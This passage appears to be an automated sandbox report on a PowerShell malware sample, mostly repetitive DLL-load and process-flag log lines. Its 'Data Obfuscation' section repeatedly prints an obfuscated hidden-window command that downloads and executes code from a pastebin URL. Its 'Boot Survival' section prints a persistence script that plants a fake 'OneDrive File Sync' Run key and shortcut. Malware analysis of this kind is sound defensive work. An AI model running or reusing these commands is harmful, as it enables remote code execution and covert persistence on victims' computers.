Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.1.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC49AE58 pushad ; ret 1_2_00007FFAAC49AE61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC4880FB push ebx; ret 1_2_00007FFAAC48816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC49749E push eax; iretd 1_2_00007FFAAC4974AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAAC49746E pushad ; iretd 1_2_00007FFAAC49749D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC4BEEA7 push ebp; ret 7_2_00007FFAAC4BEEA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC4B00BD pushad ; iretd 7_2_00007FFAAC4B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC586DC3 push edi; iretd 7_2_00007FFAAC586DC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC587BCA pushad ; ret 7_2_00007FFAAC587BCD

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
